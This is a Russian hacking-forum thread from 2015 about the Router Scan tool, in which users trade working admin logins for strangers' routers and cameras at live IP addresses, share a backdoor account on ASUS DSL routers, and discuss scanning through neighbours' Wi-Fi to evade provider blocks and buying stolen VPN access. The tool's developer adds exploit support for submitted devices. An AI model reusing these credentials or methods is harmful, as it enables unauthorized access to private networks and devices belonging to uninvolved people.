PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

henri2002
21.08.2015, 13:51
У меня на главном компе не запускается. Пишет the procedure entry point DES_set_key_unchecked could not be located in the dynamic link library libeay32.dll



закиньте два файла бетки в папку с предыдущей версией.

Forserer
21.08.2015, 21:15
Парни, а возможно ли из внешки залезть в локалку через роутер? Или сразу напрямую на машину?

gpuhash
22.08.2015, 10:10
Хозяйке на заметку:

1О9.1О7.123.112:8080 :admin

1О9.1О7.122.92:8080 admin:admin

Thompson router

в этих подсетях их много

не шмогла ни разу спарсить данные вай-фай хотя они доступны

Еще: 19О.222.14О.177 прикольный роутер без пароля, все как на ладони.

Еще: 1l5.186.117.23/home.asp тоже без пароля, их там много таких.

Еще томпсоны:

19О.158.0.38 admin:Uq-4GIt3M

19О.158.0.39 admin:Uq-4GIt3M

немного разные версии прошивок, с одной берет ессид и пароль, с другой нет. бссид не берет вообще.

Вопрос к binarymaster: можно ли парсинг страниц роутера описать скриптами? чтобы юзер сам мог подбирать конфигурацию новых роутеров.

valokorden
22.08.2015, 14:57
http://188.43.50.123:8080

admin:1q2w3e4r

Internet Broadband Router фирмы Planet

Kevin Shindel
23.08.2015, 02:12
Ребята извините за нубский вопрос, можно узнать диапазон ай-пи адреса провайдера по городу? Может есть сервис инетовский какой?

henri2002
23.08.2015, 04:38
Ребята извините за нубский вопрос, можно узнать диапазон ай-пи адреса провайдера по городу? Может есть сервис инетовский какой?



можно, 5-10 страниц назад было.

Ossen
23.08.2015, 05:06
диапазон ай-пи адреса провайдера по городу?



тут посмотрите http://2ip.ru/whois/

Triton_Mgn
23.08.2015, 08:16
Ребята извините за нубский вопрос, можно узнать диапазон ай-пи адреса провайдера по городу? Может есть сервис инетовский какой?



http://forum.antichat.ru/threads/427913/

Triton_Mgn
23.08.2015, 08:23
Иногда встречаются роутеры с прошивкой wive-ng не один не спарсился Router Scan-ом, Будет ли в будущем такая возможность? Сайт той самой прошивки http://wive-ng.sourceforge.net/

ivann
23.08.2015, 12:17
Хочу уточнить по IP, если у меня динамик IP, то router scan даст примерно процентов 30 положительных результов ?

Если, при сканировании сетей нужного мне провайдера, большенство роутов имеют динамик IP, то router scan не даст их good-ов ?

или пофиг какой , динамический, статический ip

VladimirV
23.08.2015, 12:22
Хочу уточнить по IP, если у меня динамик IP, то router scan даст примерно процентов 30 положительных результов ?

Если, при сканировании сетей нужного мне провайдера, большенство роутов имеют динамик IP, то router scan не даст их good-ов ?

или пофиг какой , динамический, статический ip



Просто сканируйте диапазон несколько раз, и если появляются новые - значит нужно сканировать чуть-ли не каждый день, и лучше когда все дома!

Triton_Mgn
23.08.2015, 13:24
Хочу уточнить по IP, если у меня динамик IP, то router scan даст примерно процентов 30 положительных результов ?

Если, при сканировании сетей нужного мне провайдера, большенство роутов имеют динамик IP, то router scan не даст их good-ов ?

или пофиг какой , динамический, статический ip



Router Scan даст тебе good ы, ну поменяются ip, таблица то останется, если в зоне видимости твоего ноутбука (или еще чего) есть wifi точка которая присутствует в таблице - все данные останутся теми же , за исключением ip. Так что свободно можно подключиться.

Forserer
23.08.2015, 13:58
А возможно настроить программу на поиск только роутеров с созданной wifi сетью?

Triton_Mgn
24.08.2015, 08:07
А возможно настроить программу на поиск только роутеров с созданной wifi сетью?



В смысле созданной кем? когда? чем? зачем? Router Scan ищет по диапазону ip, а не только роутеров с созданной wifi сетью.

Kevin Shindel
24.08.2015, 08:51
А возможно настроить программу на поиск только роутеров с созданной wifi сетью?



Тоже хотел задать такой вопрос, но я думаю это просто не реально так как роутеры без статического ай-пи. Возможно я ошибаюсь.

Наверное логичней было бы найти диапазон ай-пи адресов для своего города.

Forserer
24.08.2015, 10:45
В смысле созданной кем? когда? чем? зачем? Router Scan ищет по диапазону ip, а не только роутеров с созданной wifi сетью.



В смысле из заданного мою диапазона чтобы искать только роутеры у которых настроена и включена wifi.



Тоже хотел задать такой вопрос, но я думаю это просто не реально так как роутеры без статического ай-пи. Возможно я ошибаюсь.

Наверное логичней было бы найти диапазон ай-пи адресов для своего города.



У меня вот статический ип, так что ты ошибаешься) Проблема как выяснилось в другом, в соседних домах еще есть те кто сидит по ADSL технологии по телефонной линии, у них схема такая, модем ADSL-->Роутер-->комп потому хоть засканируй весь диапазон роутеры не обнаружить(или я ошибаюсь) так же у них тут свои внутренние IP(это я посмотрел зайдя на один из таких модемов Huawei) сканирование тоже особо результатов не дало, router scan такие модемы не опознает)

Timonus88
25.08.2015, 06:28
Подскажите почему ВПН сервер на роутерах Асус работает нестабильно?, к примеру из 50 найденных роутеров, подключится по pptp удается только к 15-20 и на следующий день из этих успешных подключений останется 3-5 а еще через день и эти перестают работать.(ошибки подключений разные, однако ошибка закрытого порта самая частая) В чем может быть причина? Возможно нужно открыть какие нибудь порты на роутерах? или провайдер блокирует порты?

Ossen
25.08.2015, 07:06
на следующий день из этих успешных подключений останется 3-5 а еще через день и эти перестают работать.



скорее всего у них ip адреса динамические.

Forserer
25.08.2015, 11:30
Возможно кто то подскажет, возможно ли вычислить внутренний диапазон серых IP у ростелекома? Пробовал делать так, подключался к 2м точкам смотрел IP. У них внутренний серый IP вида 100.65.65.220 и 100.65.118.140, провайдер один, но почему то пытался с одного ип зайти на другой, не получалось, в чем может быть причина? Наверно не пускает из за того что перебрасывает сначала с внутреннего (100.65.65.220) на внешний (вида 85.??.??.?? общий серый IP) а уже потом пытается с этого 85. прыгнуть на внутренний серый (100.65.118.140). Опять же задавал диапазон этих внутренних серых вида 100. он находит кучу роутеров, но не находит те которые рядом со мной, хотя ип я их знаю, что за магия как обойти?

Пробовал ping и tracert все нормально внутренние серые вида 100. пингуются но в браузере не открываются и сканом не видит их

Timonus88
25.08.2015, 15:05
скорее всего у них ip адреса динамические.



Извиняюсь, забыл уточнить ip не динамические, роутеры после перезагрузки доступны, на них можно зайти через веб интерфейс, есть предположение, что некий бот или задрот изменяет какие то мне неизвестные настройки, чтобы другим затруднить подключение к впн, просто во всех тех роутерах уже был настроен впн сервер и имя\пароль были заданы такого формата asus874\asus874,asus356\asus356,asus982\asus982 и т.д. в общем кто то или что то настроил тысячи впн серверов, наверное на продажу, быть может кто то в курсе где можно приобрести такую базу?

startless
27.08.2015, 06:57
ASUS RT-AC66U, firmware: 2.0

5.143.61.223:80

admin:admin

This router is not implemented. Send this IP to developers.

Ossen
28.08.2015, 23:43
Кстати на Азусах появился новый rombik1 теперь выглядит так admin:ho4uku6at

TOX1C
29.08.2015, 13:54
Кстати на Азусах появился новый rombik1 теперь выглядит так admin:ho4uku6at



тем временем, уже несколько провайдеров прикрыли дыру. там, где раньше было пару сот роутеров, теперь большой 0. пускай эти дураки и дальше свинят в чужих роутерах, скоро будут свой 4len кушать.

Ossen
29.08.2015, 19:44
тем временем, уже несколько провайдеров прикрыли дыру. там, где раньше было пару сот роутеров,



просто Ростелеком за регионы взялся и за мелких провайдеров проведя оптику и малость снизив цены вот и наблюдается практически в каждом регионе "там,где раньше было пару сот роутеров" боольшой отток абонентов на Ростелеком скорее всего причина в этом

CRACK211
29.08.2015, 22:42
тем временем, уже несколько провайдеров прикрыли дыру. там, где раньше было пару сот роутеров, теперь большой 0. пускай эти дураки и дальше свинят в чужих роутерах, скоро будут свой 4len кушать.



Дыры реально прикрыли если раньше я мог всю ночь сканировать то сейчас после нескольких секунд вырубается интернет и примерно на 1 час я сежу без интернета. Те козлы что гадят в чужих роутерах спровацировали провайдеров на решительные действия.

Ossen
29.08.2015, 22:55
Дыры реально прикрыли если раньше я мог всю ночь сканировать



логичней было бы использовать для скана соседскую вайфай точку не паля при этом свою.

CRACK211
29.08.2015, 23:11
Так и делается. Не получится провайдер один) он блокирует и не важно своя точка или соседская после нескольких найденых точек . Программа пишет сервис заблокирован и примерно от 15-69 минут нет интернета ни у меня ни у соседской точки.

Ossen
29.08.2015, 23:40
Не получится провайдер один) он блокирует и не важно своя точка или соседская



тут похоже тогда не в провайдере дело . разок такое было в бетке удалил скачал заново итог всё работает

Triton_Mgn
31.08.2015, 08:11
тут похоже тогда не в провайдере дело . разок такое было в бетке удалил скачал заново итог всё работает



Тоже заметил казус, если закрываешь router scan не дождавшись окончания сканирования, при следующем запуске не ловятся Good-ы, распаковываешь заново с архива не поломанный router scan и он работает.

binarymaster
01.09.2015, 15:17
Тоже заметил казус, если закрываешь router scan не дождавшись окончания сканирования, при следующем запуске не ловятся Good-ы, распаковываешь заново с архива не поломанный router scan и он работает.



Честно, не представляю себе, как это возможно. Сделайте diff-ы сломанной и исходной версий... интересно, что изменилось

Felis-Sapiens
01.09.2015, 20:59
TRENDnet TEW-639GR

http://super:[email protected]:8080/

binarymaster
01.09.2015, 21:50
TRENDnet TEW-639GR

http://super:[email protected]:8080/



Добавил.

hunt.lsk
01.09.2015, 22:02
Какая версия сейчас стабильна 2,52 или 2,53?

binarymaster
01.09.2015, 22:33
Какая версия сейчас стабильна 2,52 или 2,53?



2.52 стабильная, 2.53 в разработке

startless
02.09.2015, 13:27
ASUS RT-AC66U, firmware: 2.0 (3.0.0.4.378_6117)

http://admin:[email protected]

gpuhash
02.09.2015, 17:27
To binarymaster:

Вот эту модель еще посмотри пожалуйста, не парсит

1О9.1О7.123.112:8080 :admin

1О9.1О7.122.92:8080 admin:admin

Thomson router

19О.158.0.38 admin:Uq-4GIt3M

19О.158.0.39 admin:Uq-4GIt3M

немного разные версии прошивок, с одной берет ессид и пароль, с другой нет. бссид не берет вообще.

(в адресах О естессно заменить на ноль)

startless
02.09.2015, 17:54
Странно. Проверил на двух компах. Выдает только это:

7.35.17.43

80

16

Done

admin:admin

ASUS RT-AC66U, firmware: 2.0

E0:3F:49:0C:04:40

ASUS 2.4

192.168.1.1

255.255.255.0

This router is not implemented. Send this IP to developers.

Может проблема в win10?

Upsurt
02.09.2015, 19:21
http://89.25.26.102 - WLAN AP Webserver

http://89.25.28.50 - AP Router New Generation

RomanxD
02.09.2015, 20:13
Product: DSL-2600U Firmware Version: 1.00 Hardware Version: Z1

Странно. К этой модели хакает админку, но не парсит инфу.

В лок.сети провайдера более 50 штук встретилось, ни одного не спарсил.

http://s017.radikal.ru/i440/1509/fd/25047530aba4.jpg

binarymaster, в Good Results не работают Reset и Rescan. Бывает что плохо спарсит.

Felis-Sapiens
02.09.2015, 21:58
ASUS DSL-N14U http://46.20О.44.15/

ASUS DSL-N16U http://37.53.74.153:808O/

Имеют уязвимость в виде учётки qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyui:123456789012345678901 23456789012345678901234567890123456789012345678901 23456789012345678901234567890123456789012345678901 2345678

binarymaster
03.09.2015, 01:07
1О9.1О7.123.112:8080 :admin

1О9.1О7.122.92:8080 admin:admin

19О.158.0.38 admin:Uq-4GIt3M

19О.158.0.39 admin:Uq-4GIt3M



Добавил все.



немного разные версии прошивок, с одной берет ессид и пароль, с другой нет. бссид не берет вообще.



Это просто эксплойт отработал. В парсере эти прошивки реализованы не были.



This router is not implemented. Send this IP to developers.

Может проблема в win10?



У меня версия новее.



Product: DSL-2600U Firmware Version: 1.00 Hardware Version: Z1

Странно. К этой модели хакает админку, но не парсит инфу.

В лок.сети провайдера более 50 штук встретилось, ни одного не спарсил.



Хм... странно, у меня к ним вроде нет эксплойтов.



в Good Results не работают Reset и Rescan.



И не должны, ибо эта таблица не имеет привязки к потокам.

RomanxD
03.09.2015, 02:18
Хм... странно, у меня к ним вроде нет эксплойтов.



Нашёл на shodan.io DSL-2600U.

Product: DSL-2600U Firmware Version: v1.08 Hardware Version: Z2

Показал админку - admin:baran2020

http://5.221.162.253/

Можно добавить парсер в программу.

startless
03.09.2015, 02:40
Парсит нормально.



все, разобрался, версия 2.53 парсит как надо!

binarymaster
03.09.2015, 02:43
http://89.25.26.102 - WLAN AP Webserver

http://89.25.28.50 - AP Router New Generation






ASUS DSL-N14U http://46.20О.44.15/

ASUS DSL-N16U http://37.53.74.153:808O/

Имеют уязвимость в виде учётки qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyuiopqwertyuiopqwertyuiop qwertyuiopqwertyuiopqwertyui:123456789012345678901 23456789012345678901234567890123456789012345678901 23456789012345678901234567890123456789012345678901 2345678



Добавил.

binarymaster
03.09.2015, 03:00
Нашёл на shodan.io DSL-2600U.

Product: DSL-2600U Firmware Version: v1.08 Hardware Version: Z2

Показал админку - admin:baran2020

http://5.221.162.253/

Можно добавить парсер в программу.



Прошивка D-Link DSL на базе RomPager / ZyNOS, добавил.

Tsohu
03.09.2015, 19:40
Где можно скачать версию 2.53?

Felis-Sapiens
03.09.2015, 20:30
Wireless Multimode 3G Router - L10

http://admin:[email protected]/

Airlive WL-5460AP v2

http://3l.193.85.57/

http://3l.193.85.57/WLsecurity_content.asp?smode=0 - пароль к wifi

Axiomatic
03.09.2015, 21:56
Где можно скачать версию 2.53?



Пока нигде, на офф сайте разработчика нету =)

henri2002
04.09.2015, 00:08
Где можно скачать версию 2.53?



в этой теме есть бетка.

Ossen
04.09.2015, 04:48
http://79.173.124.226:8080/ перестал отображать mac essid bssid как у других ? со словарями вроде всё в порядке beta (2.53)

ania01
04.09.2015, 05:23
TP-LINK TL-WR841N с последней прошивкой

Версия встроенного ПО:

3.15.9 Build 140625 Rel.64271n

Версия оборудования:

WR841N v9 00000000

не сканит

вручную захожу через admin:admin , заходит нормально

Не могу найти в сети zyxel

Keenetic Lite III

startless
04.09.2015, 05:33
TP-LINK TL-WR841N с последней прошивкой

Версия встроенного ПО:

3.15.9 Build 140625 Rel.64271n

Версия оборудования:

WR841N v9 00000000

не сканит

вручную захожу через admin:admin , заходит нормально

Не могу найти в сети zyxel

Keenetic Lite III


IP в студию

Ossen
04.09.2015, 05:36
TP-LINK TL-WR841N с последней прошивкой



удалённое управление на нём возможно отключено во вкладке безопасность удалённое управление выставите порт 80 и ип 255.255.255.255

startless
04.09.2015, 08:26
http://79.173.124.226:8080/ перестал отображать mac essid bssid как у других ? со словарями вроде всё в порядке beta (2.53)



парсит нормально

79.173.124.226

admin:ho4uku6at

ASUS RT-N10U Black

740:2B:588:C4

mpeo12

8136822222

05540266

startless
04.09.2015, 14:08
Народ, кто и в каком виде хранит свои базы накопленных точек? У меня все просто и примитивно - в экселе 2003. Есть какая-нибудь софтина для эффективного хранения? Желательно, чтобы еще была возможность автоматом изменять и дополнять базу свежими данными.

binarymaster
04.09.2015, 14:15
Wireless Multimode 3G Router - L10

http://admin:[email protected]/

Airlive WL-5460AP v2

http://3l.193.85.57/

http://3l.193.85.57/WLsecurity_content.asp?smode=0 - пароль к wifi



Первый не успел, второй отчасти (успел слить конфиг, с сигнатурой CS03).



Не могу найти в сети zyxel

Keenetic Lite III


Да ладно?

https://www.shodan.io/search?query=ZyXEL+Keenetic+Lite+III

ania01
04.09.2015, 16:26
я про нашу сетку , по вай фай точно есть а прога роутер скан не находит под каким IP

binarymaster
04.09.2015, 16:49
Кинетики ведь вскрываются по WPS, даже не обязательно их искать в сети. Хотя насчёт 3-ей версии не в курсе, физически мне они пока не попадались.

Mr Drill
04.09.2015, 18:25
я про нашу сетку , по вай фай точно есть а прога роутер скан не находит под каким IP



Анналагична... Хотел у себя надыбать ip внешний тутошний, чтобы лабать, ан нет.

Mr Drill
04.09.2015, 18:44
Кинетики ведь вскрываются по WPS, даже не обязательно их искать в сети. Хотя насчёт 3-ей версии не в курсе, физически мне они пока не попадались.



Да после 6 неудачных попыток посылки пина включают таймаут на 12 часов, а то и на сутки в зависимости от настройки.

Metal-Core
04.09.2015, 19:07
Под модель "ZyXEL Keenetic 4G II" существуют в природе сплойты\баги ?

в exploitdb нет нужного, удалось найти ток XSS. перебрутил hydr'ой кучу словарей не эффективно, пасс там не сбрутить(

gpuhash
05.09.2015, 12:46
137.118.16O.202:8080 admin:admin

BEC 7800TN R2

все видно но роутерскан не знает такого

ania01
05.09.2015, 13:55
IP в студию



http://10.9.25.141/



Кинетики ведь вскрываются по WPS, даже не обязательно их искать в сети. Хотя насчёт 3-ей версии не в курсе, физически мне они пока не попадались.



в том то и дело WPS отключено

Axiomatic
05.09.2015, 14:14
Вчера находило IP камеру, логин и пароль admin 123456, сегодня ее в гуд результатах нет , а в закладке реалтайм на против ее ип адреса Can't load main page.

Чо за фигня ?

Metal-Core
05.09.2015, 15:12
Вчера находило IP камеру, логин и пароль admin 123456, сегодня ее в гуд результатах нет , а в закладке реалтайм на против ее ип адреса Can't load main page.

Чо за фигня ?



Возможно что там динамический IP.

binarymaster
05.09.2015, 15:54
137.118.16O.202:8080 admin:admin

BEC 7800TN R2

все видно но роутерскан не знает такого



Какая-то сильно модифицированная прошивка Micro DSL, добавил.



http://10.9.25.141/



Локальная сеть Акадо, или другая?



Вчера находило IP камеру, логин и пароль admin 123456, сегодня ее в гуд результатах нет , а в закладке реалтайм на против ее ип адреса Can't load main page.

Чо за фигня ?



Варианты с вероятностью по убыванию:

а) IP-адрес камеры изменился

б) Какой-нибудь глюк веб интерфейса

в) На ней закрыли доступ извне

ania01
05.09.2015, 17:13
внутренняя сеть провайдера

binarymaster
05.09.2015, 17:28
внутренняя сеть провайдера



Эм... это очевидно. Но чтобы иметь возможность проверить/исправить баг, мне нужен к нему доступ. Следовательно, интересует какой именно провайдер (возможно у меня есть доступ к нему), и поэтому я задал вопрос выше.

ania01
05.09.2015, 18:25
отправил в личку, если не сложно напиши о результатах

binarymaster
06.09.2015, 00:46
отправил в личку, если не сложно напиши о результатах



В общем, нашёл точку входа в сеть, но доступа к городской сети оттуда нет.

Маршрут топает в сторону Москвы и Билайна...


tracert -d 10.9.25.141

Трассировка маршрута к 10.9.25.141 с максимальным числом прыжков 30

1 45 ms 43 ms 86 ms 172.21.171.3
2 48 ms 45 ms 45 ms 89.250.144.33
3 56 ms 44 ms 44 ms 89.250.144.34
4 49 ms 46 ms 70 ms 37.60.16.217
5 45 ms 46 ms 48 ms 37.60.16.159
6 46 ms 47 ms 47 ms 195.218.253.241
7 84 ms 86 ms 84 ms 79.104.245.104
8 82 ms 83 ms 83 ms 79.104.231.157
9 82 ms 88 ms 86 ms 79.104.231.116
10 * * * Превышен интервал ожидания для запроса.
11 * * * Превышен интервал ожидания для запроса.
В общем, могу посоветовать использовать функцию TCP debug logging, которая есть в последней бете. Включите эту функцию, выполните сканирование узла, и в папке программы появится поддиректория с датой. В ней лог файл, его отправить мне.

gpuhash
06.09.2015, 01:31
Кстати есть еще пожелание пропускать символы табуляции в списке IP-адресов, т.к. они часто туда попадают из таблиц диапазонов конкретных AS.

Приходится чистить их руками.

И может выложишь бетку с последними правками?

binarymaster
06.09.2015, 01:39
Кстати есть еще пожелание пропускать символы табуляции в списке IP-адресов, т.к. они часто туда попадают из таблиц диапазонов конкретных AS.

Приходится чистить их руками.



Это при добавлении диапазонов (через + или редактор), я правильно понял?



И может выложишь бетку с последними правками?



Да могу конечно, только там есть кое-что начатое, но недоделанное в GUI.

gpuhash
06.09.2015, 01:45
Это при добавлении диапазонов (через + или редактор), я правильно понял?



Да

Чтобы допускала строки вида 123.45.67.0/24 и т.п.

Ossen
06.09.2015, 01:53
Да могу конечно, только там есть кое-что начатое, но недоделанное в GUI.



Думаю что ничего страшного в этом нет

ania01
06.09.2015, 05:48
В общем, нашёл точку входа в сеть, но доступа к городской сети оттуда нет.

Маршрут топает в сторону Москвы и Билайна...


tracert -d 10.9.25.141

Трассировка маршрута к 10.9.25.141 с максимальным числом прыжков 30

1 45 ms 43 ms 86 ms 172.21.171.3
2 48 ms 45 ms 45 ms 89.250.144.33
3 56 ms 44 ms 44 ms 89.250.144.34
4 49 ms 46 ms 70 ms 37.60.16.217
5 45 ms 46 ms 48 ms 37.60.16.159
6 46 ms 47 ms 47 ms 195.218.253.241
7 84 ms 86 ms 84 ms 79.104.245.104
8 82 ms 83 ms 83 ms 79.104.231.157
9 82 ms 88 ms 86 ms 79.104.231.116
10 * * * Превышен интервал ожидания для запроса.
11 * * * Превышен интервал ожидания для запроса.
В общем, могу посоветовать использовать функцию TCP debug logging, которая есть в последней бете. Включите эту функцию, выполните сканирование узла, и в папке программы появится поддиректория с датой. В ней лог файл, его отправить мне.



не могу найти beta 2.53, где скачать?

Triton_Mgn
06.09.2015, 08:34
нашла , только проблемы с запуском,

распакованная не запускается кидаю в нее библиотеки от 2.52 , работает.



Надо в 2.52 заменить файлы из бета версии.

gpuhash
06.09.2015, 11:02
1O9.67.175.86:8080 Admin:Admin

NETGEAR DGN2200

Не парсит эту модель, а таких довольно много

Mr Drill
06.09.2015, 20:03
http://10.9.25.141/

в том то и дело WPS отключено



Как определяешь внешний ip точки?

binarymaster
07.09.2015, 00:39
Да

Чтобы допускала строки вида <TAB><TAB><TAB><SPACE>123.45.67.0/24 и т.п.



Сделал.



1O9.67.175.86:8080 Admin:Admin

NETGEAR DGN2200

Не парсит эту модель, а таких довольно много



DGN2200 уже поддерживается, а конкретно эта - DGN2200v2, это большая разница. Добавил.)



не парсит?

пробовал 2.52 и 2.53 одно и тоже

csv

http://rghost.ru/75p48pXxM



Не нашёл там устройств, на которые можно зайти со стандартными паролями.



TP-LINK TL-WR841N с последней прошивкой

Версия встроенного ПО:

3.15.9 Build 140625 Rel.64271n

Версия оборудования:

WR841N v9 00000000

не сканит

вручную захожу через admin:admin , заходит нормально






отправил в личку, если не сложно напиши о результатах



Посмотрел дамп, все заголовки корректные, но авторизоваться не может. Не знаю, в чём причина. Если удастся найти такой же роутер с такой же прошивкой во внешней сети, и чтобы на него можно было залогиниться, прошу оповестить.

ZAVAR
07.09.2015, 03:42
85.95.184.15:8080

TL-WR841N

Замучился с ним.

Есть база паролей?

ania01
07.09.2015, 05:35
можно получить статический IP на точку без провайдера?

RomanxD
07.09.2015, 15:47
85.95.184.15:8080

TL-WR841N

Замучился с ним.

Есть база паролей?



Router Scan админку не подобрал. Зашёл с браузера под admin:admin. Камера.

ZAVAR
07.09.2015, 20:01
Router Scan админку не подобрал. Зашёл с браузера под admin:admin. Камера.



Камера на 80 порте а роутер на 8080.

Ossen
07.09.2015, 22:47
На ряд Микротиков заметил подходит уже приевшийся пароль от веб интерфейса admin 15011974 и admin s15011974 http://94.243.242.217:80 MikroTik RouterOS v6.6

http://94.243.240.49:80 MikroTik RouterOS v5.25

gentux
08.09.2015, 00:00
@binarymaster (https://forum.antichat.xyz/members/148032/) Не знаю читали Вы новость или нет.

http://www.opennet.ru/opennews/art.shtml?num=42870

В DSL-маршрутизаторах Asus, ZTE и Digicom выявлены предопределённые параметры входа.

Triton_Mgn
09.09.2015, 19:50
Почему то при сканировании на DIR 615 HNAP Bypass выдергивает данные с роутера а авторизацию к роутеру нет, как так? Скрин прилагается .

http://rghost.ru/87RlHKrbH

И еще вопрос, будет ли процесс работы RouterScan быстрее если список диапазонов разделить и запустить одновременно в нескольких экземплярах Router Scan?

Triton_Mgn
09.09.2015, 23:18
Возможно ли добавить NETGEAR JNR1010? Не парсятся, а таких навалом на dom.ru

binarymaster
10.09.2015, 01:11
Почему то при сканировании на DIR 615 HNAP Bypass выдергивает данные с роутера а авторизацию к роутеру нет, как так? Скрин прилагается .

http://rghost.ru/87RlHKrbH



Мне бы этот скрин в текстовом виде... вероятно, стандартные пароли к админкам не подошли.

И ещё, поскольку HNAP представляет собой отдельный модуль, полученный им пароль сети не удастся без костылей попробовать к админке (только вручную после сканирования).



И еще вопрос, будет ли процесс работы RouterScan быстрее если список диапазонов разделить и запустить одновременно в нескольких экземплярах Router Scan?



Сомневаюсь. Ещё в предыдущей версии я оптимизировал цепной алгоритм получения IP из списка диапазонов. Другой вопрос - если включена генерация гудов, то чем больше список найденных устройств, тем медленнее генерируются гуды. В этом подобное распараллеливание может помочь.



Возможно ли добавить NETGEAR JNR1010?



Уже добавил.

Ossen
10.09.2015, 01:27
Может потестируем текущую бетку?? с последними изменениями.

binarymaster
10.09.2015, 02:17
Может потестируем текущую бетку?? с последними изменениями.



Что-ж, давайте потестируем.

http://rghost.ru/6PvrKPNKD

Пароль как обычно.

P.S. возможно отвалилась загрузка в 3WiFi, ещё не проверял, просто довёл до состояния, чтобы оно компилировалось без ошибок.

Ossen
10.09.2015, 02:21
P.S. возможно отвалилась загрузка в 3WiFi, ещё не проверял,



Подтверждаю отвалилась

moaddip
10.09.2015, 02:28
где т можно слить все пароли с базки ?

binarymaster
10.09.2015, 02:41
где т можно слить все пароли с базки ?



Здэс.

https://forum.antichat.ru/posts/3889621

Triton_Mgn
10.09.2015, 07:38
Вот весь файл csv в текстовом виде пользоваться поиском hnap вылезут dir 615 http://rghost.ru/8HcKM72VK

Тоже подтверждаю отвалилась загрузка 3WiFi , окно загрузки залипло и ничего не оставалось, как прибить router scan через диспетчер задач, результаты сканирования не сохранены и потеряны. ))

Shimura
10.09.2015, 08:12
по поводу новой беты. долго висит Waiting for stopping threads

уже полчаса ждёт, на Force stop не реагирует

до этого выскакивало окошко о высокой загрузке цп и остановке генерации гудов

Triton_Mgn
10.09.2015, 09:04
что случилось с VertigoServ?

http://hkar.ru/DF2h

Triton_Mgn
10.09.2015, 10:58
binarymaster можешь извлечь из базы пару логин\пароль к админке роутера, думаю на Hydra очень бы помогла.

binarymaster
11.09.2015, 01:20
Вот весь файл csv в текстовом виде пользоваться поиском hnap вылезут dir 615



Посмотрел, там пароли к админкам не подходят.



Тоже подтверждаю отвалилась загрузка 3WiFi , окно загрузки залипло и ничего не оставалось, как прибить router scan через диспетчер задач, результаты сканирования не сохранены и потеряны. ))



Не рекомендую тестировать что-либо, если я об этом предупредил, и при этом есть риск потерять данные.



по поводу новой беты. долго висит Waiting for stopping threads

уже полчаса ждёт, на Force stop не реагирует

до этого выскакивало окошко о высокой загрузке цп и остановке генерации гудов



Сталкивался с таким только на одной машине, на которой стоял Аваст. Повесилась вся система, пришлось перезагружать.



binarymaster можешь извлечь из базы пару логин\пароль к админке роутера, думаю на Hydra очень бы помогла.



Могу, но пока не хочу, есть свои риски.

binarymaster
11.09.2015, 01:56
Кстати, некоторые Кинетики от ZyXEL теперь тоже могут в PPTP сервер.

http://zyxel.ru/kb/3984

Felis-Sapiens
11.09.2015, 16:48
Cisco Cable Modem - показывает пароли с кавычками как "1311276D"

http://admin:[email protected]:808O/

http://admin:[email protected]:808O/

http://:@190.113.143.186:808O/

Upsurt
11.09.2015, 18:46
@irLAN WR04 V1.00.18

http://89.25.118.51:8080/ admin:admin

binarymaster
11.09.2015, 21:56
Cisco Cable Modem - показывает пароли с кавычками как "1311276D"

http://admin:[email protected]:808O/

http://admin:[email protected]:808O/

http://:@190.113.143.186:808O/



Исправил. Появилось ощущение, что этих кавычек со временем становится всё больше... баг прошивки?

binarymaster
11.09.2015, 21:56
@irLAN WR04 V1.00.18

http://89.25.118.51:8080/ admin:admin



ERR_CONNECTION_REFUSED

Felis-Sapiens
11.09.2015, 22:10
Исправил. Появилось ощущение, что этих кавычек со временем становится всё больше... баг прошивки?



Да уж. Когда я смотрел у первого было три кавычки, сейчас уже семь

Upsurt
12.09.2015, 17:26
Wireless Access Point Gateway EnGenius

http://89.25.29.115:80 admin:admin

binarymaster
12.09.2015, 19:41
Wireless Access Point Gateway EnGenius

http://89.25.29.115:80 admin:admin



Нет подключения.

Evgeha514
12.09.2015, 23:38
Прога супер, раньше пользовался MyLanViewer теперь этой буду, почему я не знал о ней раньше(((((

binarymaster
13.09.2015, 01:38
Fuck yeah!

Добился стабильной многопоточности без использования дополнительных потоков в Core Library. Надо было лишь дописать в инициализацию:

IsMultiThread := True;
А это значит, что новый релиз будет работать быстрее, стабильнее, и требовать меньше ресурсов, как в старые добрые времена!

Ossen
13.09.2015, 02:01
что новый релиз будет работать быстрее, стабильнее, и требовать меньше ресурсов



может сразу и заценить?

CRACK211
13.09.2015, 09:24
Вопрос. А нельзя добавить автосохранение гоод результатов и сканирования в файл и очистке программы после сохранения? Просто поставил на сутки сканер а когда вернулся увидел ошибку что то с компом или программой. 25тыс гудов ушло в горы( мне кажется было бы хорошо если бы программа сохраняла каждые 100 гудов или меньше и каждые 1000 сканирования в отдельные файлы. И очищала бы программу продолжая сканирование. И ресурсов меньше будет есть и результат не пропадет. Из за ошибки программы или бонального скачка наприжения итп. Может режим такой отдельно сделать для длительного сканирования?

Payer
13.09.2015, 09:33
Вопрос. А нельзя добавить автосохранение гоод результатов



Есть там функция автосохранения.

В настройках нужно поставить интервал и формат.

http://i66.fastpic.ru/big/2015/0913/66/3802e90600293f67cfd1d6338a040b66.jpg

-----------

Версия 253b3 умеет замораживаться. Останавливается сканирование, перестает есть трафик, но грузит процессор и стоит.

В автосозранение пишет одни и те же данные, счетчик потоков тоже замораживается.

Стабильно условий такого поведения не выявил, но несколько раз на друх совсем разных ПК заметил.

CRACK211
13.09.2015, 09:35
( я на красном( ткните носом пожалуйста))))

Все поехал (нашел) невнимательность(

спасибо большое)

Payer
13.09.2015, 14:51
новый релиз будет работать быстрее, стабильнее, и требовать меньше ресурсов, как в старые добрые времена!



Отличная новость!

У меня ноутбук со слабым процессором новые версии не тянул.

Даже 50 потоков тормозили жутко.

В 253b3 порадовала функция обрезки пробелов и табуляций при вводе диапазонов.

На вебстраницах сервисов IP, whois и прочее обычно через буфер они попадают.

Раньше приходилось редактировать, теперь на ура проходит.

Triton_Mgn
13.09.2015, 23:16
binarymaster попробуем ?

W@rdrive
13.09.2015, 23:56
Ждём свежую версию! Кстати, заметил, что частенько на узлы, которые не ответили в отведенное время при сканировании, лучше зайти потом самому через браузер)))

